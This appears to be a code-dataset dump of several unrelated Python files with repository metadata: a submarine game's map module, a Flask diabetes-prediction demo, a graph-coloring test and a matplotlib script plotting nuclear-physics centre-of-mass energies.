def outward_broadcast(self, strength: int) -> str:
# This is what the sub sees when scanning this cell.
suffix = ""
if "hiddenness" in self.attributes:
if self._hidden(strength):
return ""
suffix = " (was hidden)"
broadcast = []
if self.attributes.get("weather", "normal") == "stormy":
broadcast.append("a storm brewing")
if len(self.treasure) > 0:
if strength > 2:
broadcast.append(self.treasure_string())
else:
plural = ""
if len(self.treasure) != 1:
plural = "s"
broadcast.append(f"{len(self.treasure)} treasure{plural}")
if "diverse" in self.attributes:
broadcast.append("a diverse ecosystem")
if "ruins" in self.attributes:
broadcast.append("some ruins")
if "junk" in self.attributes:
broadcast.append("some submarine debris")
if "deposit" in self.attributes:
broadcast.append("a mineral deposit")
if "docking" in self.attributes:
broadcast.append("a docking station")
prefix = "An unnamed square, containing: "
square_name = self.name()
if square_name is not None:
prefix = f"An square named {square_name}, containing: "
if len(broadcast) > 0:
return f"{prefix}{list_to_and_separated(broadcast)}{suffix}"
return ""
# We can't type check this because it would cause a circular import.
def on_entry(self, sub) -> Tuple[str, bool]:
# This is what happens when a sub attempts to enter this space.
# This includes docking and damage.
if "docking" in self.attributes:
sub.movement.set_direction(reverse_dir[sub.movement.get_direction()])
sub.power.activate(False)
(x, y) = sub.movement.get_position()
return f"Docked at **{self.attributes['docking'].title()}** at position ({x}, {y})! The power has been stopped. Please call !exit_sub to leave the submarine and enter the docking station.", False
if "obstacle" in self.attributes:
sub.damage(1)
sub.movement.set_direction(reverse_dir[sub.movement.get_direction()])
return f"The submarine hit a wall and took one damage!", True
return "", False
def can_npc_enter(self) -> bool:
return not ("docking" in self.attributes or "obstacle" in self.attributes)
def to_char(self, to_show: List[str], show_hidden: bool = False,
perspective: Optional[Collection[str]] = None) -> str:
if show_hidden or not self._hidden(0, perspective):
if "t" in to_show and len(self.treasure) > 0:
return "T"
if "a" in to_show and "ruins" in self.attributes:
return "A"
if "j" in to_show and "junk" in self.attributes:
return "J"
if "m" in to_show and "deposit" in self.attributes:
return "M"
if "e" in to_show and "diverse" in self.attributes:
return "E"
if "w" in to_show and "obstacle" in self.attributes:
if "wallstyle" in self.attributes and self.attributes['wallstyle'] in WALL_STYLES:
return self.attributes['wallstyle']
else:
return "W"
if "d" in to_show and "docking" in self.attributes:
return "D"
if "s" in to_show and "weather" in self.attributes:
return WEATHER.get(self.attributes.get("weather", "normal"), ".")
return "."
def map_name(self, to_show: List[str], show_hidden: bool = False,
perspective: Optional[Collection[str]] = None) -> Optional[str]:
# For Thomas' map drawing code.
# Gives names to squares that make sense.
treasure = ""
if not show_hidden and self._hidden(0, perspective):
return ""
if "t" in to_show and len(self.treasure) > 0:
treasure = self.treasure_string()
name = self.name(to_show)
if name is not None:
if treasure != "":
return f"{name} (with treasure {treasure})"
return name
if treasure != "":
return f"has {treasure}"
return None
def docked_at(self) -> Optional[str]:
# Returns its name if it's a docking station, else None
if "docking" in self.attributes:
return self.attributes["docking"].title()
return None
def difficulty(self) -> int:
difficulties = {"storm": 8, "rough": 6, "normal": 4, "calm": 2}
modifier = 1 if "ruins" in self.attributes else 0
return difficulties.get(self.attributes.get('weather', "normal"), 4) + modifier
def has_been_scanned(self, subname: str, strength: int) -> None:
if not self._hidden(strength):
self.explored.add(subname)
def _hidden(self, strength: int, ships: Optional[Collection[str]] = None) -> bool:
if ships and not self.explored.isdisjoint(ships):
return False
else:
return "hiddenness" in self.attributes and self.attributes["hiddenness"] > strength
def add_attribute(self, attr: str, val="") -> bool:
if attr not in ATTRIBUTES:
return False
validator = self.VALIDATORS.get(attr, NopValidator())
clean = validator(val)
if clean is None:
return False
if attr not in self.attributes or self.attributes[attr] != clean:
self.attributes[attr] = clean
self.explored.clear()
return True
return False
def remove_attribute(self, attr: str) -> bool:
if attr in self.attributes:
del self.attributes[attr]
self.explored.clear()
return True
return False
undersea_map = [[Cell() for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
def in_world(x: int, y: int) -> bool:
return 0 <= x < X_LIMIT and 0 <= y < Y_LIMIT
def possible_directions() -> List[str]:
return list(directions.keys())
def get_square(x: int, y: int) -> Optional[Cell]:
if in_world(x, y):
return undersea_map[x][y]
return None
def bury_treasure_at(name: str, pos: Tuple[int, int]) -> bool:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].bury_treasure(name)
return False
def unbury_treasure_at(name: str, pos: Tuple[int, int]) -> bool:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].unbury_treasure(name)
return False
def pick_up_treasure(pos: Tuple[int, int], power: int) -> List[str]:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].pick_up(power)
return []
def map_tick():
for x in range(X_LIMIT):
for y in range(Y_LIMIT):
undersea_map[x][y].cell_tick()
def map_to_dict() -> Dict[str, Any]:
"""
Converts our map to dict form. Since each of our map entries can be
trivially converted into dicts, we just convert them individually.
We also append a class identifier so they can be recreated correctly.
"""
undersea_map_dicts : List[List[Dict[str, Any]]] = [[{} for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
for i in range(X_LIMIT):
for j in range(Y_LIMIT):
undersea_map_dicts[i][j] = undersea_map[i][j]._to_dict()
return {"map": undersea_map_dicts, "x_limit": X_LIMIT, "y_limit": Y_LIMIT}
def map_from_dict(dictionary: Dict[str, Any]):
"""
Takes a triple generated by map_to_dict and overwrites our map with it.
"""
global X_LIMIT, Y_LIMIT, undersea_map
X_LIMIT = dictionary["x_limit"]
Y_LIMIT = dictionary["y_limit"]
map_dicts = dictionary["map"]
undersea_map_new = [[Cell._from_dict(map_dicts[x][y]) for y in range(Y_LIMIT)] for x in range(X_LIMIT)]
undersea_map = undersea_map_new
| 9,001 | 988 | 184 |
e0c510106ef78198473f06da95d40e884b02a014 | 1,961 | py | Python | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
from wtforms import Form, TextAreaField, validators
import os
import pickle
app = Flask(__name__)
######## Preparing the Predictor
cur_dir = os.path.dirname(__file__)
clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects/diabetes.pkl'), 'rb'))
@app.route('/')
@app.route('/results', methods=['POST'])
if __name__ == '__main__':
app.run(debug=True)
#
#
#2,108,64,30.37974684,156.05084746,30.8,0.158,21
| 33.237288 | 153 | 0.587455 | from flask import Flask, render_template, request
from wtforms import Form, TextAreaField, validators
import os
import pickle
app = Flask(__name__)
######## Preparing the Predictor
cur_dir = os.path.dirname(__file__)
clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects/diabetes.pkl'), 'rb'))
def classify(document):
label = {0: 'negative', 1: 'positive'}
print ("==========================================")
print (document)
print ("==========================================")
document = document.split(',')
document = [float(i) for i in document]
y = clf.predict([document])[0]
return label[y]
class ReviewForm(Form):
moviereview = TextAreaField('',
[validators.DataRequired(),
validators.length(min=15)])
@app.route('/')
def index():
form = ReviewForm(request.form)
return render_template('reviewform.html', form=form)
@app.route('/results', methods=['POST'])
def results():
form = ReviewForm(request.form)
if request.method == 'POST':
pregnacies = request.form['number_of_pregnacies']
glucose = request.form['glucose']
blood_pressure = request.form['blood_pressure']
thickness = request.form['thickness']
insulin = request.form['insulin']
body_mass_index = request.form['body_mass_index']
diabetes_pedigree = request.form['diabetes_pedigree']
age = request.form['age']
test = pregnacies+ "," + glucose+ "," + blood_pressure+ "," + thickness+ "," + insulin+ "," + body_mass_index+ "," + diabetes_pedigree+ "," + age
y = classify(test)
return render_template('results.html',
content=test,
prediction=y)
return render_template('reviewform.html', form=form)
if __name__ == '__main__':
app.run(debug=True)
#
#
#2,108,64,30.37974684,156.05084746,30.8,0.158,21
| 1,235 | 158 | 90 |
92e9a81f33bc75b1870d7a82ff76972027a6c214 | 485 | py | Python | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | 5 | 2021-05-27T09:26:30.000Z | 2021-05-28T10:33:46.000Z | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | null | null | null | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | 1 | 2021-05-28T08:43:05.000Z | 2021-05-28T08:43:05.000Z | """Module to test graph with maximum size that supports coloring algorithm."""
import sys
import os
from time import time
sys.path.append(os.getcwd())
from graph.graph_coloring import Graph
graph = Graph()
graph.create_graph_from_file('graph/graph_coloring_tests/max_size_graph.txt')
start = time()
colored_vertices = graph.color_graph(995)
end = time()
expected = [f'V{num}:{num}' for num in range(1, 995)]
print(expected == colored_vertices)
print('Time taken: ', end - start)
| 23.095238 | 78 | 0.752577 | """Module to test graph with maximum size that supports coloring algorithm."""
import sys
import os
from time import time
sys.path.append(os.getcwd())
from graph.graph_coloring import Graph
graph = Graph()
graph.create_graph_from_file('graph/graph_coloring_tests/max_size_graph.txt')
start = time()
colored_vertices = graph.color_graph(995)
end = time()
expected = [f'V{num}:{num}' for num in range(1, 995)]
print(expected == colored_vertices)
print('Time taken: ', end - start)
| 0 | 0 | 0 |
871c6f314ff69142514f2c265c9c846749999e69 | 9,791 | py | Python | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | import sys
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MultipleLocator
from matplotlib import gridspec
from mpl_toolkits.axes_grid.inset_locator import inset_axes
#majorLocatorX = MultipleLocator(2)
#minorLocatorX = MultipleLocator(1)
#majorLocatorY = MultipleLocator(0.05)
#minorLocatorY = MultipleLocator(0.025)
filename1 = '/home/sam/Documents/thesis/data/PA_EOM_COM.dat'
filename2 = '/home/sam/Documents/thesis/data/PR_EOM_COM.dat'
hw0_1 = []
e0_1 = []
hw1_1 = []
e1_1 = []
hwa_1 = []
hw0_2 = []
e0_2 = []
hw1_2 = []
e1_2 = []
hwa_2 = []
hw0_3 = []
e0_3 = []
hw1_3 = []
e1_3 = []
hwa_3 = []
hw0_4 = []
e0_4 = []
hw1_4 = []
e1_4 = []
hwa_4 = []
hw0_5 = []
e0_5 = []
hw1_5 = []
e1_5 = []
hwa_5 = []
hw0_6 = []
e0_6 = []
hw1_6 = []
e1_6 = []
hwa_6 = []
hw0_7 = []
e0_7 = []
hw1_7 = []
e1_7 = []
hwa_7 = []
hw0_8 = []
e0_8 = []
hw1_8 = []
e1_8 = []
hwa_8 = []
with open(filename1) as f1:
data1 = f1.read()
data1 = data1.split('\n')
with open(filename2) as f2:
data2 = f2.read()
data2 = data2.split('\n')
for num in range(len(data1)):
line = data1[num].split()
if( num - num%6 == 0 ):
hw0_1.append(float(line[0]))
e0_1.append(float(line[6]))
elif( num - num%6 == 6 ):
hw0_2.append(float(line[0]))
e0_2.append(float(line[6]))
elif( num - num%6 == 12 ):
hw0_3.append(float(line[0]))
e0_3.append(float(line[6]))
elif( num - num%6 == 18 ):
hw0_4.append(float(line[0]))
e0_4.append(float(line[6]))
if( num >= 24 and num%2 == 0 ):
line2 = data1[num+1].split()
if( num >= 24 and num < 36 ):
if( float(line[7]) < float(line2[7]) ):
hw1_1.append(float(line[0]))
e1_1.append(float(line[7]))
hwa_1.append(float(line[1]))
else:
hw1_1.append(float(line2[0]))
e1_1.append(float(line2[7]))
hwa_1.append(float(line2[1]))
if( num >= 36 and num < 48 ):
if( float(line[7]) < float(line2[7]) ):
hw1_2.append(float(line[0]))
e1_2.append(float(line[7]))
hwa_2.append(float(line[1]))
else:
hw1_2.append(float(line2[0]))
e1_2.append(float(line2[7]))
hwa_2.append(float(line2[1]))
if( num >= 48 and num < 60 ):
if( float(line[7]) < float(line2[7]) ):
hw1_3.append(float(line[0]))
e1_3.append(float(line[7]))
hwa_3.append(float(line[1]))
else:
hw1_3.append(float(line2[0]))
e1_3.append(float(line2[7]))
hwa_3.append(float(line2[1]))
if( num >= 60 and num < 72 ):
if( float(line[7]) < float(line2[7]) ):
hw1_4.append(float(line[0]))
e1_4.append(float(line[7]))
hwa_4.append(float(line[1]))
else:
hw1_4.append(float(line2[0]))
e1_4.append(float(line2[7]))
hwa_4.append(float(line2[1]))
for num in range(len(data2)):
line = data2[num].split()
if( num - num%6 == 0 ):
hw0_5.append(float(line[0]))
e0_5.append(float(line[6]))
elif( num - num%6 == 6 ):
hw0_6.append(float(line[0]))
e0_6.append(float(line[6]))
elif( num - num%6 == 12 ):
hw0_7.append(float(line[0]))
e0_7.append(float(line[6]))
elif( num - num%6 == 18 ):
hw0_8.append(float(line[0]))
e0_8.append(float(line[6]))
if( num >= 24 and num%2 == 0 ):
line2 = data2[num+1].split()
if( num >= 24 and num < 36 ):
if( float(line[7]) < float(line2[7]) ):
hw1_5.append(float(line[0]))
e1_5.append(float(line[7]))
hwa_5.append(float(line[1]))
else:
hw1_5.append(float(line2[0]))
e1_5.append(float(line2[7]))
hwa_5.append(float(line2[1]))
if( num >= 36 and num < 48 ):
if( float(line[7]) < float(line2[7]) ):
hw1_6.append(float(line[0]))
e1_6.append(float(line[7]))
hwa_6.append(float(line[1]))
else:
hw1_6.append(float(line2[0]))
e1_6.append(float(line2[7]))
hwa_6.append(float(line2[1]))
if( num >= 48 and num < 60 ):
if( float(line[7]) < float(line2[7]) ):
hw1_7.append(float(line[0]))
e1_7.append(float(line[7]))
hwa_7.append(float(line[1]))
else:
hw1_7.append(float(line2[0]))
e1_7.append(float(line2[7]))
hwa_7.append(float(line2[1]))
if( num >= 60 and num < 72 ):
if( float(line[7]) < float(line2[7]) ):
hw1_8.append(float(line[0]))
e1_8.append(float(line[7]))
hwa_8.append(float(line[1]))
else:
hw1_8.append(float(line2[0]))
e1_8.append(float(line2[7]))
hwa_8.append(float(line2[1]))
print(e0_1)
print(hw0_1)
print(e1_1)
print(hw1_1)
print(hwa_1)
print(e0_2)
print(hw0_2)
print(e1_2)
print(hw1_2)
print(hwa_2)
print(e0_3)
print(hw0_3)
print(e1_3)
print(hw1_3)
print(hwa_3)
print(e0_4)
print(hw0_4)
print(e1_4)
print(hw1_4)
print(hwa_4)
#hw0_1_1 = hw0_1[:-1]
#e0_1_1 = e0_1[:-1]
#hw0_2_1 = hw0_2[:-1]
#e0_2_1 = e0_2[:-1]
plt.rc('font', family='serif')
fig = plt.figure(figsize=(11, 10))
gs = gridspec.GridSpec(2, 2)
ax1 = plt.subplot(gs[0])
plt.plot(hw0_1, e0_1, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{17}O(5/2^{+})}$')
plt.plot(hw0_2, e0_2, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{17}F(5/2^{+})}$')
plt.plot(hw0_3, e0_3, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{23}O(1/2^{+})}$')
plt.plot(hw0_4, e0_4, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{23}F(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.5, 9.0])
plt.setp(ax1.get_xticklabels(), visible=False)
ax1.set_ylabel(r'$\mathrm{E_{cm}(\omega)\ (MeV)}$', fontsize=15)
ax1.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax2 = plt.subplot(gs[1])
plt.plot(hw1_1, e1_1, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{17}O(5/2^{+})}$')
plt.plot(hw1_2, e1_2, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{17}F(5/2^{+})}$')
plt.plot(hw1_3, e1_3, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{23}O(1/2^{+})}$')
plt.plot(hw1_4, e1_4, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{23}F(5/2^{+})}$')
plt.axis([6.0, 30.0, 0.0, 1.0])
plt.setp(ax2.get_xticklabels(), visible=False)
ax2.set_ylabel(r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$', fontsize=15)
inset_axes2 = inset_axes(ax2,width="50%",height=1.5,loc=1)
plt.plot(hw0_1, hwa_1, '-', marker='o', color='r', linewidth=2.0)
plt.plot(hw0_3, hwa_3, '-.', marker='v', color='b', linewidth=2.0)
plt.xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=14)
plt.ylabel(r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$', fontsize=14)
annotation_string = r'$\mathrm{^{17}O,^{17}F}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.25, 0.75), xycoords='axes fraction')
annotation_string = r'$\mathrm{^{23}O,^{23}F}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.50, 0.25), xycoords='axes fraction')
ax2.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax3 = plt.subplot(gs[2])
plt.plot(hw0_5, e0_5, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{15}N(1/2^{-})}$')
plt.plot(hw0_6, e0_6, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{15}O(1/2^{-})}$')
plt.plot(hw0_7, e0_7, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{21}N(1/2^{-})}$')
plt.plot(hw0_8, e0_8, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{21}O(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.5, 10.0])
ax3.set_xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=15)
ax3.set_ylabel(r'$\mathrm{E_{cm}(\omega)\ (MeV)}$', fontsize=15)
ax3.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax4 = plt.subplot(gs[3])
plt.plot(hw1_5, e1_5, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{15}N(1/2^{-})}$')
plt.plot(hw1_6, e1_6, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{15}O(1/2^{-})}$')
plt.plot(hw1_7, e1_7, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{21}N(1/2^{-})}$')
plt.plot(hw1_8, e1_8, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{21}O(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.1, 1.0])
ax4.set_xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=15)
ax4.set_ylabel(r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$', fontsize=15)
inset_axes4 = inset_axes(ax4,width="50%",height=1.5,loc=1)
plt.plot(hw0_5, hwa_5, '-', marker='o', color='r', linewidth=2.0)
plt.plot(hw0_7, hwa_7, '-.', marker='v', color='b', linewidth=2.0)
plt.xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=14)
plt.ylabel(r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$', fontsize=14)
annotation_string = r'$\mathrm{^{15}N,^{15}O}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.25, 0.75), xycoords='axes fraction')
annotation_string = r'$\mathrm{^{21}N,^{21}O}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.50, 0.25), xycoords='axes fraction')
ax4.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
#ax.xaxis.set_major_locator(majorLocatorX)
#ax.xaxis.set_minor_locator(minorLocatorX)
#ax.yaxis.set_major_locator(majorLocatorY)
#ax.yaxis.set_minor_locator(minorLocatorY)
plt.tight_layout()
plt.savefig('EOM-CoM.pdf', format='pdf', bbox_inches='tight')
plt.show()
| 33.416382 | 104 | 0.563885 | import sys
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MultipleLocator
from matplotlib import gridspec
from mpl_toolkits.axes_grid.inset_locator import inset_axes
#majorLocatorX = MultipleLocator(2)
#minorLocatorX = MultipleLocator(1)
#majorLocatorY = MultipleLocator(0.05)
#minorLocatorY = MultipleLocator(0.025)
filename1 = '/home/sam/Documents/thesis/data/PA_EOM_COM.dat'
filename2 = '/home/sam/Documents/thesis/data/PR_EOM_COM.dat'
hw0_1 = []
e0_1 = []
hw1_1 = []
e1_1 = []
hwa_1 = []
hw0_2 = []
e0_2 = []
hw1_2 = []
e1_2 = []
hwa_2 = []
hw0_3 = []
e0_3 = []
hw1_3 = []
e1_3 = []
hwa_3 = []
hw0_4 = []
e0_4 = []
hw1_4 = []
e1_4 = []
hwa_4 = []
hw0_5 = []
e0_5 = []
hw1_5 = []
e1_5 = []
hwa_5 = []
hw0_6 = []
e0_6 = []
hw1_6 = []
e1_6 = []
hwa_6 = []
hw0_7 = []
e0_7 = []
hw1_7 = []
e1_7 = []
hwa_7 = []
hw0_8 = []
e0_8 = []
hw1_8 = []
e1_8 = []
hwa_8 = []
with open(filename1) as f1:
data1 = f1.read()
data1 = data1.split('\n')
with open(filename2) as f2:
data2 = f2.read()
data2 = data2.split('\n')
for num in range(len(data1)):
line = data1[num].split()
if( num - num%6 == 0 ):
hw0_1.append(float(line[0]))
e0_1.append(float(line[6]))
elif( num - num%6 == 6 ):
hw0_2.append(float(line[0]))
e0_2.append(float(line[6]))
elif( num - num%6 == 12 ):
hw0_3.append(float(line[0]))
e0_3.append(float(line[6]))
elif( num - num%6 == 18 ):
hw0_4.append(float(line[0]))
e0_4.append(float(line[6]))
if( num >= 24 and num%2 == 0 ):
line2 = data1[num+1].split()
if( num >= 24 and num < 36 ):
if( float(line[7]) < float(line2[7]) ):
hw1_1.append(float(line[0]))
e1_1.append(float(line[7]))
hwa_1.append(float(line[1]))
else:
hw1_1.append(float(line2[0]))
e1_1.append(float(line2[7]))
hwa_1.append(float(line2[1]))
if( num >= 36 and num < 48 ):
if( float(line[7]) < float(line2[7]) ):
hw1_2.append(float(line[0]))
e1_2.append(float(line[7]))
hwa_2.append(float(line[1]))
else:
hw1_2.append(float(line2[0]))
e1_2.append(float(line2[7]))
hwa_2.append(float(line2[1]))
if( num >= 48 and num < 60 ):
if( float(line[7]) < float(line2[7]) ):
hw1_3.append(float(line[0]))
e1_3.append(float(line[7]))
hwa_3.append(float(line[1]))
else:
hw1_3.append(float(line2[0]))
e1_3.append(float(line2[7]))
hwa_3.append(float(line2[1]))
if( num >= 60 and num < 72 ):
if( float(line[7]) < float(line2[7]) ):
hw1_4.append(float(line[0]))
e1_4.append(float(line[7]))
hwa_4.append(float(line[1]))
else:
hw1_4.append(float(line2[0]))
e1_4.append(float(line2[7]))
hwa_4.append(float(line2[1]))
for num in range(len(data2)):
line = data2[num].split()
if( num - num%6 == 0 ):
hw0_5.append(float(line[0]))
e0_5.append(float(line[6]))
elif( num - num%6 == 6 ):
hw0_6.append(float(line[0]))
e0_6.append(float(line[6]))
elif( num - num%6 == 12 ):
hw0_7.append(float(line[0]))
e0_7.append(float(line[6]))
elif( num - num%6 == 18 ):
hw0_8.append(float(line[0]))
e0_8.append(float(line[6]))
if( num >= 24 and num%2 == 0 ):
line2 = data2[num+1].split()
if( num >= 24 and num < 36 ):
if( float(line[7]) < float(line2[7]) ):
hw1_5.append(float(line[0]))
e1_5.append(float(line[7]))
hwa_5.append(float(line[1]))
else:
hw1_5.append(float(line2[0]))
e1_5.append(float(line2[7]))
hwa_5.append(float(line2[1]))
if( num >= 36 and num < 48 ):
if( float(line[7]) < float(line2[7]) ):
hw1_6.append(float(line[0]))
e1_6.append(float(line[7]))
hwa_6.append(float(line[1]))
else:
hw1_6.append(float(line2[0]))
e1_6.append(float(line2[7]))
hwa_6.append(float(line2[1]))
if( num >= 48 and num < 60 ):
if( float(line[7]) < float(line2[7]) ):
hw1_7.append(float(line[0]))
e1_7.append(float(line[7]))
hwa_7.append(float(line[1]))
else:
hw1_7.append(float(line2[0]))
e1_7.append(float(line2[7]))
hwa_7.append(float(line2[1]))
if( num >= 60 and num < 72 ):
if( float(line[7]) < float(line2[7]) ):
hw1_8.append(float(line[0]))
e1_8.append(float(line[7]))
hwa_8.append(float(line[1]))
else:
hw1_8.append(float(line2[0]))
e1_8.append(float(line2[7]))
hwa_8.append(float(line2[1]))
print(e0_1)
print(hw0_1)
print(e1_1)
print(hw1_1)
print(hwa_1)
print(e0_2)
print(hw0_2)
print(e1_2)
print(hw1_2)
print(hwa_2)
print(e0_3)
print(hw0_3)
print(e1_3)
print(hw1_3)
print(hwa_3)
print(e0_4)
print(hw0_4)
print(e1_4)
print(hw1_4)
print(hwa_4)
#hw0_1_1 = hw0_1[:-1]
#e0_1_1 = e0_1[:-1]
#hw0_2_1 = hw0_2[:-1]
#e0_2_1 = e0_2[:-1]
plt.rc('font', family='serif')
fig = plt.figure(figsize=(11, 10))
gs = gridspec.GridSpec(2, 2)
ax1 = plt.subplot(gs[0])
plt.plot(hw0_1, e0_1, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{17}O(5/2^{+})}$')
plt.plot(hw0_2, e0_2, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{17}F(5/2^{+})}$')
plt.plot(hw0_3, e0_3, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{23}O(1/2^{+})}$')
plt.plot(hw0_4, e0_4, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{23}F(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.5, 9.0])
plt.setp(ax1.get_xticklabels(), visible=False)
ax1.set_ylabel(r'$\mathrm{E_{cm}(\omega)\ (MeV)}$', fontsize=15)
ax1.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax2 = plt.subplot(gs[1])
plt.plot(hw1_1, e1_1, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{17}O(5/2^{+})}$')
plt.plot(hw1_2, e1_2, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{17}F(5/2^{+})}$')
plt.plot(hw1_3, e1_3, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{23}O(1/2^{+})}$')
plt.plot(hw1_4, e1_4, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{23}F(5/2^{+})}$')
plt.axis([6.0, 30.0, 0.0, 1.0])
plt.setp(ax2.get_xticklabels(), visible=False)
ax2.set_ylabel(r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$', fontsize=15)
inset_axes2 = inset_axes(ax2,width="50%",height=1.5,loc=1)
plt.plot(hw0_1, hwa_1, '-', marker='o', color='r', linewidth=2.0)
plt.plot(hw0_3, hwa_3, '-.', marker='v', color='b', linewidth=2.0)
plt.xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=14)
plt.ylabel(r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$', fontsize=14)
annotation_string = r'$\mathrm{^{17}O,^{17}F}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.25, 0.75), xycoords='axes fraction')
annotation_string = r'$\mathrm{^{23}O,^{23}F}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.50, 0.25), xycoords='axes fraction')
ax2.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax3 = plt.subplot(gs[2])
plt.plot(hw0_5, e0_5, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{15}N(1/2^{-})}$')
plt.plot(hw0_6, e0_6, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{15}O(1/2^{-})}$')
plt.plot(hw0_7, e0_7, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{21}N(1/2^{-})}$')
plt.plot(hw0_8, e0_8, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{21}O(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.5, 10.0])
ax3.set_xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=15)
ax3.set_ylabel(r'$\mathrm{E_{cm}(\omega)\ (MeV)}$', fontsize=15)
ax3.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
ax4 = plt.subplot(gs[3])
plt.plot(hw1_5, e1_5, '-', marker='o', color='k', linewidth=2.0, label=r'$\mathrm{{}^{15}N(1/2^{-})}$')
plt.plot(hw1_6, e1_6, '--', marker='s', color='r', linewidth=2.0, label=r'$\mathrm{{}^{15}O(1/2^{-})}$')
plt.plot(hw1_7, e1_7, ':', marker='^', color='b', linewidth=2.0, label=r'$\mathrm{{}^{21}N(1/2^{-})}$')
plt.plot(hw1_8, e1_8, '-.', marker='v', color='g', linewidth=2.0, label=r'$\mathrm{{}^{21}O(5/2^{+})}$')
plt.axis([6.0, 30.0, -0.1, 1.0])
ax4.set_xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=15)
ax4.set_ylabel(r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$', fontsize=15)
inset_axes4 = inset_axes(ax4,width="50%",height=1.5,loc=1)
plt.plot(hw0_5, hwa_5, '-', marker='o', color='r', linewidth=2.0)
